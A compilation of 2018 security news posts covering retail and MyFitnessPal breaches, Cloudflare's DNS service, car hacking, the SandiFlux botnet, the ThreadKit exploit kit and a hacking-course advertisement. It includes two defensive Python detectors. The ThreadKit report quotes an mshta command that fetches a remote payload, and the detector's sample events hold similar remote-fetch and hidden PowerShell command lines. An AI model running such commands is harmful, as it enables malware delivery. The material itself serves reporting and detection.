
Hackers Stole Millions of Payment Card Data From Saks Fifth Avenue, and Lord & Taylor Stores

Hackers stole millions of customer records, including payment card details, from certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores located in North America.

HBC is currently investigating the issue, and there is no indication that it affects the company’s e-commerce or other digital platforms, Hudson’s Bay, Home Outfitters, or HBC Europe.

“HBC identified the issue and has taken steps to contain it,” reads the company statement. “Once the company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring.”

The company also confirmed that there is no indication that Social Security or Social Insurance numbers, driver’s license numbers, or PINs were affected in the data breach.

HBC said it is working with leading data security investigators to gather information for customers, and its investigation is still in progress.

The breach was highlighted by Gemini Advisory; according to its analysis of the available data, “the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised. The majority of stolen credit cards were obtained from New York and New Jersey locations”.

Gemini Advisory estimates that the breach occurred between May 2017 and the present. The JokerStash hacking syndicate announced the sale of the compromised records on March 28, 2018.

“Using our analytical tools, that were specifically developed so as to empower financial firms to watch asset portfolio exposure within the deep & dark net, we’ve got established with a high level of confidence that victims of the attack are Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discount outlet of the luxury department store Saks Fifth Avenue, and Lord & Taylor Stores,” says Gemini Advisory.

Gemini Advisory says that, at the time of writing, approximately 35,000 records from Saks Fifth Avenue and 90,000 records from Lord & Taylor had been released for sale.

As a precaution, customers are advised to monitor their account statements closely. If any unauthorized transaction is detected, notify your card issuer immediately.

Cloudflare Announced Internet’s Fastest DNS Service 1.1.1.1 that Extremely Focus on Consumer Privacy

Cloudflare announced the 1.1.1.1 DNS service for everyone; notably, it is the first consumer-focused service offered by Cloudflare.

According to DNSPerf, 1.1.1.1 ranks number one and is faster than anything else. For IPv4 you can use the resolvers 1.1.1.1 and 1.0.0.1; for IPv6, the resolvers are 2606:4700:4700::1111 and 2606:4700:4700::1001.

Cloudflare reduces latency by building data centers all around the globe: “we want everyone to be within 10 milliseconds of at least one of our locations”. Instead of a centralized cache, it uses an innovative distributed cache.

With the 1.1.1.1 DNS service, Cloudflare also enhances its privacy-protection mechanisms: it does not write querying IP addresses to disk, wipes all logs within 24 hours, and wipes transaction logs within a week.

Cloudflare says: “We will never log your IP address (the way other companies identify you). And we’re not just saying that. We’ve retained KPMG to audit our systems annually to ensure that we’re doing what we say”.

Why was the service launched on April 1st? Because “they planned to reach a wider audience and at the same time it has 4 1s”. Cloudflare says “the product was built to make the Internet better, more secure, more reliable, and more efficient”.

With the 1.1.1.1 DNS service one can resolve non-Cloudflare domain names in 14 ms globally, and domains using Cloudflare’s authoritative DNS get an added benefit, as the resolver and the recursor are in the same network.

We have tested 8.8.8.8 and 1.1.1.1; here is the result. Integration is very easy and can be done in minutes without any third-party software.

Cloudflare also published a guide on how to configure the service on iPhone, macOS, Android, Windows, Linux, and routers. The easily remembered 1.1.1.1 DNS service is a joint venture of Cloudflare and APNIC: Cloudflare operates the service and APNIC holds the IP address (1.1.1.1).

Yet another free service, Quad9, launched last November; it blocks known malicious domains and prevents your computer and IoT devices from connecting to malware or phishing sites.

To use the Quad9 DNS service, change your computer’s preferred DNS server to 9.9.9.9; your requests will then be routed through Quad9 DNS instead of your ISP’s default DNS.

Modern Cars are Vulnerable to Hacking and Malware Attack

Today’s modern cars use a lot of technology and are always connected to the internet, which makes them extremely vulnerable and easy to compromise through malware attacks and other security flaws present in the IoT devices connected to them.

Connected cars are rapidly increasing in number, and multiple IoT devices connected to the car need to communicate remotely in order to provide the user with functions such as Wi-Fi and driver assistance.

The automotive security field involves a lot of security risks, since modern cars are exposed to many vulnerabilities and face the same high security risks as other connected devices.

Major Modern Cars Security Risk

Image Courtesy: McAfee

Vehicle-to-Vehicle Communications

Vehicle-to-Vehicle communication is established over a wireless network that allows two vehicles to communicate with each other on the road, for example to reduce the car’s speed if another vehicle comes closer.

In this case, an attacker could abuse a flaw in the wireless communication technology to reduce the car’s speed. If a vehicle is infected with destructive malware, the V2V system becomes a vector, and a malicious actor could create malware that infects many connected cars.

Controller Area Network Backdoor

Many cars use a controller area network (CAN) to communicate with the vehicle’s electronic control units (ECUs), which operate many subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts, including the engine.

Modern cars have an On-Board Diagnostics version 2 (OBD-II) port used by mechanics to diagnose problems, and CAN traffic can be intercepted through this OBD port.

So an external OBD device could be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection and unlocking the doors.

Malware and Exploits

Modern car technology allows us to connect our smartphones to our cars, adding functions such as phone calls, SMS, music, and audiobooks.

Recent powerful malware and exploits could compromise the connected device and its firmware, which in turn could compromise the car’s devices.

Car Theft and Key Fob Hacking

Key fob hacking is a procedure that enables an attacker to enter the car without breaking in. This technique is commonly used by thieves and can be carried out effectively with inexpensive equipment.

In this case, the attacker blocks the signal from the wireless key so the car does not lock, and can also replay the signal to compromise the car.

According to McAfee research, one variant of the attack uses a jammer to block the signal. The jammer interferes with the electromagnetic waves used to communicate with the vehicle, blocking the signal and preventing the car from locking, leaving access free to the attacker.

Personal Data and Tracking

Connected cars keep recording sensitive personal data about drivers from connected external devices such as phones; this can include contact details, SMS and call history, and even musical tastes.

This data can be used by companies, cybercriminals, and governments for various purposes, such as spying on and tracking people, marketing, or insurance contracts.

Fake Car Data

Vehicle data can be altered and faked. By adjusting information such as emissions tests or performance figures, manufacturers could alter results to increase sales. Additionally, drivers could change car statistics, for example the distance driven, to trick insurance companies or future buyers.

SandiFlux – Hackers using Fast Flux Method in Wild For Malware Distribution

Hackers have started using fast flux infrastructure in the wild to hide malicious activities such as malware and phishing campaigns. A new fast flux infrastructure, named SandiFlux, has been identified.

Fast flux is a technique in which multiple IP addresses are assigned to the same domain and are rotated constantly in quick succession through DNS records.

Security researchers from Proofpoint identified a new fast flux infrastructure, dubbed SandiFlux, used to distribute malware; it is also acting as a proxy for GandCrab ransomware.

Starting in December, researchers observed new fast flux domain nodes and decided to monitor them separately, along with some events from DarkCloud. Threat actors also moved from DarkCloud to SandiFlux.

The DarkCloud/Fluxxy botnet is centralized in Ukraine and Russia (77.4% and 14.5%), whereas SandiFlux nodes are concentrated in Romania and Bulgaria (46.4% and 21.3% of the botnet, respectively), with the rest spread across other countries in Europe, Africa, the Middle East, and southern Asia.

SandiFlux heatmap

Starting from March 27, 2018, researchers spotted GandCrab ransomware C&C servers using the proxied SandiFlux infrastructure.

GandCrab proxied C&C communication

“Although we have not observed a single overlap between DarkCloud and SandiFlux in the last four months, we cannot confirm that the two infrastructures are unrelated,” the researchers said.

The DarkCloud botnet was first uncovered in 2016 and continues to expand; it contains a huge number of name servers and changes IP addresses every minute to avoid detection.

Researchers concluded that “while DarkCloud/Fluxxy is the best documented, a new Fast Flux botnet has emerged with nodes of compromised hosts distributed much more widely. It is likely that both are operated by the same actor who rents capabilities to other actors”.
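The fast flux behaviour described above (one name, many IPs, rotated every minute or so, spread across many networks) leaves a measurable footprint in DNS answers. The following is an added example, not Proofpoint’s code, that scores a domain from a series of resolution snapshots; the snapshots, the field names and the thresholds are constructed for illustration and would need tuning against CDN traffic in production.

```python
"""Fast-flux indicator scoring over repeated DNS resolutions.

Added example (not Proofpoint's code). Heuristics, each worth one point:
  - many unique IPs across the observation window
  - low TTL (<= 300 s), so clients re-resolve often
  - IPs spread over many /16 networks (compromised hosts, not one hosting range)
  - high churn: answers keep replacing IPs seen in the previous answer
A legitimate CDN can score 2-3 (low TTL, many IPs), so pair the score with
an allowlist of known CDN ranges before alerting.
"""
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class Snapshot:
    ts: int          # seconds since start of observation (constructed field)
    ttl: int         # TTL returned with the A records
    ips: frozenset   # A records returned in this answer


def distinct_prefixes(ips, prefixlen=16):
    """Collapse addresses to their /prefixlen network to measure spread."""
    return {ip_network(f"{ip}/{prefixlen}", strict=False) for ip in ips}


def flux_score(snapshots):
    """Return (score, details) for an ordered series of answers to one name."""
    all_ips = set()
    churn_total = 0.0
    prev = None
    for snap in sorted(snapshots, key=lambda s: s.ts):
        all_ips |= snap.ips
        if prev is not None:
            # fraction of this answer's IPs that were not in the previous answer
            churn_total += len(snap.ips - prev.ips) / len(snap.ips)
        prev = snap
    churn = churn_total / max(len(snapshots) - 1, 1)
    min_ttl = min(s.ttl for s in snapshots)
    prefixes = len(distinct_prefixes(all_ips))

    score = 0
    if len(all_ips) >= 10:
        score += 1
    if min_ttl <= 300:
        score += 1
    if prefixes >= 5:
        score += 1
    if churn >= 0.5:
        score += 1
    details = {"unique_ips": len(all_ips), "min_ttl": min_ttl,
               "prefixes": prefixes, "churn": round(churn, 2)}
    return score, details


def is_fast_flux(snapshots, threshold=3):
    return flux_score(snapshots)[0] >= threshold


# Constructed sample data using reserved/documentation ranges only.
# A fluxing name: 60 s TTL, a mostly new set of IPs on every resolution.
FLUX_SNAPSHOTS = [
    Snapshot(0, 60, frozenset({"192.0.2.15", "198.51.100.7", "203.0.113.40",
                               "198.18.4.9", "100.64.12.3"})),
    Snapshot(60, 60, frozenset({"192.0.2.15", "198.19.77.2", "100.65.8.1",
                                "203.0.113.99", "198.51.100.240"})),
    Snapshot(120, 60, frozenset({"198.18.4.9", "100.64.200.5", "192.0.2.201",
                                 "198.19.1.1", "203.0.113.7"})),
]
# A stable name: long TTL, same two IPs in one /16 every time.
STABLE_SNAPSHOTS = [
    Snapshot(0, 3600, frozenset({"192.0.2.10", "192.0.2.11"})),
    Snapshot(3600, 3600, frozenset({"192.0.2.10", "192.0.2.11"})),
]

if __name__ == "__main__":
    for name, snaps in (("flux.example", FLUX_SNAPSHOTS),
                        ("stable.example", STABLE_SNAPSHOTS)):
        print(name, flux_score(snaps), "fast-flux" if is_fast_flux(snaps) else "ok")
```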

150 Million user Accounts Affected with MyFitnessPal Data Breach

The MyFitnessPal data breach affected more than 150 million user accounts. Attackers stole usernames, email addresses, and hashed passwords.

The breach most likely happened in February this year, and the company identified the unauthorized access to data on its servers on March 25, 2018.

MyFitnessPal confirmed that payment cards were not affected by the breach, as they are collected and processed separately. No government-issued identifiers such as Social Security numbers and driver’s license numbers were affected, “because we don’t collect that information from users,” the MyFitnessPal statement reads.

The identity of the party behind the unauthorized access has not yet been determined, and the company is working with data security firms to investigate it.

The majority of the passwords were hashed with bcrypt, and a few with SHA-1, a 160-bit hashing function.

After understanding the scope of the attack, the company sent notification emails to customers asking them “to change their passwords immediately” and providing details on how they can protect their private data.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities. We continue to make enhancements to our systems to detect and prevent unauthorized access to user information,” the MyFitnessPal statement reads.

29 Year Old Russian Hacker who accused of Hacking LinkedIn and Dropbox Extradited to United States

29-year-old Russian hacker Yevgeni Aleksandrovich Nikulin, charged with hacking into LinkedIn, Dropbox and Formspring, was extradited to the United States from the Czech Republic last Friday.

He possibly compromised more than 100 million user accounts and was charged with three counts of computer intrusion, two counts of causing damage to a protected computer, two counts of aggravated identity theft, one count of trafficking, and one count of conspiracy.

Nikulin was arrested in Prague in October 2016 under an international warrant issued by the US. After being extradited to the US, he appeared in Federal District Court in San Francisco and pleaded not guilty to the charges against him, the NYTimes reported.

Nikulin’s lawyers argued that his case was politically motivated. Russia issued an arrest warrant for Mr. Nikulin in November 2016 for stealing $3,450 via WebMoney. His case turned into a battle between Russia and the United States.

Nikulin was arrested on Oct 5, 2016, by officials in the Czech Republic, and he was accused by the US Department of Justice of hacking computers belonging to LinkedIn, Dropbox, and Formspring and obtaining information from them.

He gained access to LinkedIn, Dropbox and Formspring during 2012-2013. If convicted, he could be sentenced to more than 30 years in prison and fined more than $1 million.

“This is deeply troubling behavior once again emanating from Russia,” Attorney General Jeff Sessions said in a statement. “We will not tolerate criminal cyber attacks and will make it a priority to investigate and prosecute these crimes, regardless of the country where they originate.”

“We have every reason to believe and expect that Mr. Nikulin will be extradited to America,” says Paul D. Ryan; he also added that the “United States has the case to prevail on having him extradited, whether it’s the severity of the crime”.

Cyber Criminals Hacked Major U.S. Mortgage Company Computer Servers to Steal Sensitive Data – FBI

A team of 4 hackers residing in San Diego infiltrated a mortgage company’s computer servers to steal sensitive data between 2011 and 2014.

The stolen information included loan application data from thousands of customers, such as Social Security numbers, addresses, dates of birth, and driver’s license numbers, which the group used for various malicious activities.

Hackers Used Fuzzing Technique

John Baden, the chief hacker and one of the masterminds of this hacking group, compromised the mortgage company using a well-known hacking technique called fuzzing.

Fuzzing, as described by the FBI, overloads a web server with massive amounts of data, which can lead to the server revealing security loopholes.

In this case, “once Baden had access to victims’ information, he and his conspirators, Victor Fernandez, Jason Bailey, and Joel Nava, went to work. Fernandez—the group’s ringleader—identified multiple victims’ brokerage accounts and took control of them by calling the companies and providing the victims’ personal information to change passwords and contact information.”

25,000 Compromised Victims

They then transferred funds from the victims’ accounts to accounts controlled by the hackers, sometimes transferring up to $30,000 at a time.

A spokesperson from the FBI said victims stretched from California to Florida, and one individual lost nearly $1 million in the scheme.

In this case, more than 25,000 victims were compromised by these hackers, and the FBI believes the real number could be higher than expected; it is impossible to calculate, since there was so much retail fraud over such a long period of time.

“Investigators worked backward from the mortgage company, eventually identifying the hack—and the hackers. By that time, Baden was hiding in Mexico. In 2014, he was named to the San Diego FBI’s Most Wanted Cyber Fugitives list, and the reward offered in the case eventually led to his capture in Mexico, Christopherson said.”

According to the FBI, all four hackers pleaded guilty to their roles in the fraud scheme. In 2015, Baden was sentenced federally to nine years in prison. In January 2018, Fernandez was sentenced to more than 10 years in prison. Bailey received a sentence of more than five years, and in February 2018, Nava was the last subject to be sentenced, to 44 months in prison.

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

A newly discovered Microsoft Office document exploit kit, called ThreadKit, contains a variety of recent exploits and delivers malware such as Lokibot and Formbook, targeting various organizations and individuals around the world.

These exploit kits are available in restricted underground crime forums, where cybercriminals sell them at different prices.

They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot, and are also used for more sophisticated cyber attacks.

Exploit Kit Activities in June 2017

ThreadKit initially started its activities around mid-2017 with several powerful exploits, including EXE and DOC files embedded inside VBS scripts.

It contained an exploit for CVE-2017-0199 that downloads and executes the payload from its command and control server, installing the embedded Smoke Loader and Trick banking malware.

Downloaded decoy document

Exploit Kit Activities in October 2017

During October 2017, ThreadKit started being advertised in the underground forum, now including another exploit, CVE-2017-8759.

It then communicates with the C2 server to execute the embedded executable; new vulnerabilities were also integrated over time.

It also uses various techniques to avoid detection, including an advanced method of modifying a registry key.

The registry value “z|#” contains the path to the parent malicious document

Exploit kit Activities November 2017

Since November 2017, ThreadKit has stepped up its activities, employing brand new Microsoft Office vulnerabilities.

It advertised the inclusion of exploits targeting CVE-2017-11882, running the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”

Exploit kit Activity in February/March 2018

The most recent activity of this exploit kit, in February/March 2018, includes a serious new exploit, the Adobe Flash zero-day (CVE-2018-4878), and several new Microsoft Office vulnerabilities.

According to Proofpoint, a new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.

The main distribution vector was a large spike in email campaigns carrying ThreadKit-generated MS Office attachments that included these exploits.

“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors,” Proofpoint said.
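The mshta.exe command quoted above gives defenders a concrete process-creation signature: an Office document should not normally cause mshta.exe to fetch a remote HTA. The following is an added example, not Proofpoint’s or ThreadKit’s code, that runs two such rules over constructed process-creation events; the Sysmon-style field names (Image, ParentImage, CommandLine, ProcessId), the sample events and the example.net URL are assumptions made for illustration.

```python
"""Detect the Office-to-mshta process chain used by ThreadKit-built documents.

Added example (not Proofpoint's code). Two rules:
  mshta_remote_hta           mshta.exe launched with an http(s) URL argument
  office_spawns_script_host  an Office process (or the Equation Editor binary
                             eqnedt32.exe, which CVE-2017-11882 targets; a known
                             fact, not taken from the article) spawns a script host
Input events are dicts shaped like Sysmon Event ID 1 fields (assumed names).
"""
import re
from pathlib import PureWindowsPath

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path, so rules ignore install location."""
    return PureWindowsPath(path).name.lower()


def evaluate(event):
    """Return the list of rule names that fire for one process-creation event."""
    hits = []
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    return hits


def scan(events):
    """Return (ProcessId, rule hits) for every event that triggers at least one rule."""
    return [(e["ProcessId"], hits) for e in events if (hits := evaluate(e))]


# Constructed sample events; the URL uses the reserved example.net domain.
SAMPLE_EVENTS = [
    {"ProcessId": 4380, "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" C:\Users\alice\invoice.doc'},
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": "mshta.exe https://malicious.example.net/vmware/w"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc AAAA"},
    {"ProcessId": 6004, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\tools\local_app.hta"},  # benign local HTA
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```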

The Advanced Computer Hacker Professional Certification Course Bundle 2018

Cyber attacks are evolving with more sophisticated and stealthy techniques to compromise organizations as well as individuals. To prevent such cyber attacks, as a security professional you should learn more about current attack vectors and advanced-level hacking skills. Here we introduce a complete cyber security course.

The IT cyber security course is an essential step towards earning the Ethical Hacker Certification, CISA, CISSP, CISM and CHFI security qualifications. This package is also one of the most cost-effective routes to IT cyber security excellence.

Today we introduce to you one of the best advanced-level cyber security course bundles, the Computer Hacker Professional Certification Bundle, for just $49.

This advanced-level cyber security certification course will walk you through the skills and concepts you need to master five elite cyber security certification exams: CEH, CISA, CISM, CISSP and CHFI.

This course will take you through advanced-level ethical hacking; you get five courses worth $1500 in this single package for just $49, with 1 year of unlimited access.

Here’s what you’ll get in these Five courses:

  1. Ethical Hacker Certification Training
  2. CISSP: Certified Information Systems Security Professional Training
  3. CISM – Certified Information Security Manager
  4. CISA – Certified Information Systems Auditor
  5. Computer Hacking Forensics Investigator Certification Training

Ethical Hacker Certification Training

To beat hackers, you have to think like them, and in this Cyber Security Course, you’ll master the skills of hacking and penetration in order to learn how to defeat malicious hackers. Companies of all sizes are constantly looking to improve IT security in this day and age, and this course will help you get qualified as an ethical hacker.

  • Access 19 comprehensive modules 24/7
  • Use enumeration to catalog system resources & potential routes to breach
  • Discuss automated tools for breaching security like Trojans, backdoors, viruses, worms, & DoS attacks
  • Learn the role of social engineering in stealing confidential information
  • Explore web-based attacks that can take online systems down
  • Understand how wireless network security can be breached & how hackers avoid protective measures like IDS, firewalls & honeypots

CISSP: Certified Information Systems Security Professional Training

The CISSP certification is a globally-recognized certification in the field of information security and has become a standard of achievement that is acknowledged worldwide.

Offered by the International Information Systems Security Certification Consortium, commonly known as (ISC)², CISSP is an objective measure of excellence, which requires a broad level of knowledge.

You’ll master the fundamentals of information systems security and learn the skills you need to pass the CISSP exam. If you’re interested in tech and want to earn a great living securing networks, this course is for you.

  • The principles of access control and how they can be strengthened and applied to keep unauthorized users out of a system.
  • Telecommunications and network systems that need to be hardened to prevent data loss or theft.
  • The role that information governance and risk management play in raising security standards, and how they need to be applied to corporate information systems.
  • The importance of secure software architecture and design to help ensure that in-house systems protect data and resources.
  • Using cryptography to protect data in transit and prevent unauthorized access of files without the correct encryption keys.
  • Using security architecture and design principles to limit data access and potential angles of attack.
  • Monitoring, auditing and improving operations security to keep systems secure at the point of access.

CISM – Certified Information Security Manager

The demand for skilled information security managers is on the rise, and CISM is the globally accepted certification standard of achievement in this area.

The uniquely management-focused CISM certification ensures you are equipped with the best practices in the IT industry and recognizes your expertise to manage, design, oversee and assess an enterprise’s information security.

  • How to establish and maintain an information security governance framework, and the processes required to support it.
  • How to manage information risks to an acceptable level to meet the business and compliance requirements of the organization.
  • Build, implement and operate an information security program that perfectly aligns with the wider information security strategy.
  • Planning the correct response to information security incidents, including defining the investigation and recovery steps required to minimize business impact.

CISA – Certified Information Systems Auditor

The CISA certification is renowned across the world as the standard of achievement for those who audit, monitor, assess and control information technology and business systems.

Being CISA-certified showcases your audit experience, skills, and knowledge, and signifies that you are an expert in managing vulnerabilities, instituting controls and ensuring compliance within the enterprise.

  • The information systems audit process and how it is applied in a real-world environment.
  • The importance of applying information technology governance principles to maintain levels of security and availability.
  • Defining and managing the information systems and infrastructure life cycle to better plan for upgrades and replacements.
  • Codifying IT service delivery and support mechanisms and levels to ensure that systems and users remain fully productive and issues are properly prioritized.
  • Identifying critical information assets and designing systems to protect each from loss, theft or unauthorized access.
  • Building a business continuity and disaster recovery strategy that will help keep the organization running in the event of a major system failure.

Get This Complete 5-Course Advanced-Level Security Bundle for just $49

Computer Hacking Forensics Investigator Certification Training – Cyber Security Course

In this Cyber Security Course, you’ll learn about computer hacking forensics. Yes, sort of like what they do on CSI. This course begins with a look at the action required immediately after an attack has been identified, and then proceeds to examine the in-depth procedures involved in investigating a hacking incident. If you have an interest in working on the legal side of computer hacking, this course is for you. Before you know it, you’ll be prepared to take and pass the CHFI certification exam.

  • Learn how to carry out an investigation according to industry best practices & legal guidelines
  • Cover searching & seizing resources as required for the investigation
  • Know how to handle digital evidence to maintain legal standards
  • Acquire & duplicate data to preserve evidence and facilitate further investigation
  • Use AccessData’s Forensic Toolkit (FTK), EnCase & special steps to review data whilst leaving all evidence intact
  • Understand steganography & how such techniques can be used to mask data theft